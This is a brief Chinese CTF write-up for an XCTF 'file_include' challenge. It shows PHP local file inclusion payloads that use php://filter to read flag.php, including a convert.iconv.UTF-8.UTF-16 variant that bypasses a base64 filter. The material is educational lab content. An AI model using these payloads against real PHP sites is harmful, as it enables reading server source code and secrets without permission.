一、题目链接

https://adworld.xctf.org.cn/challenges/list

二、解法步骤

  本题依然是文件包含，那么构造paylaod:?filename=php://filter/read=convert.base64-encode/resource=flag.php

  发现存在过滤，事实上read=convert.base64是编码转换过滤器，它可以有其他的替代形式：convert.iconv.<input-encoding>.<output-encoding>，<input_encodning>就是输入编码，<output-encoding>就是输出解码，这里我们填写utf-8,utf-16:convert.iconv.utf-8.utf-16，那么对应的payload更改为：?filename=php://filter/convert.iconv.UTF-8.UTF-16/resource=flag.php：得到flag：

三、总结

  本题又是一个file_include的小改编，通过此题可以知道更多的filter过滤器的写法。

本栏目推荐文章
• 读元宇宙改变一切笔记06_虚拟世界引擎
• 读元宇宙改变一切笔记06_虚拟世界引擎
• 数论专题
• 【专题】2023中国经济高质量发展中的商业地产趋势与机遇专题报告PDF合集分享（附原数据表）
• 【专题】2022云上新型电力系统报告PDF合集分享（附原数据表）
• 【专题】新零售下品牌消费者为中心的数字化转型报告PDF合集分享（附原数据表）
• 海亮01/12dp专题
• 14-与世界相交, 与时代相通
• 渔夫和屈原的对话屈原内心世界
• 【专题】2023年大语言模型综合评测报告PDF合集分享（附原数据表）

file_include include 专题 世界 CTFerfile_include include专题 世界 file_include include世界file 新生include专题ctfer 专题glance世界ctfer can_has_stdio专题 世界ctfer php_rce专题 世界ctfer 桌面 专题 世界ctfer lottery专题 世界ctfer 斑马 专题 世界ctfer easyupload专题 世界ctfer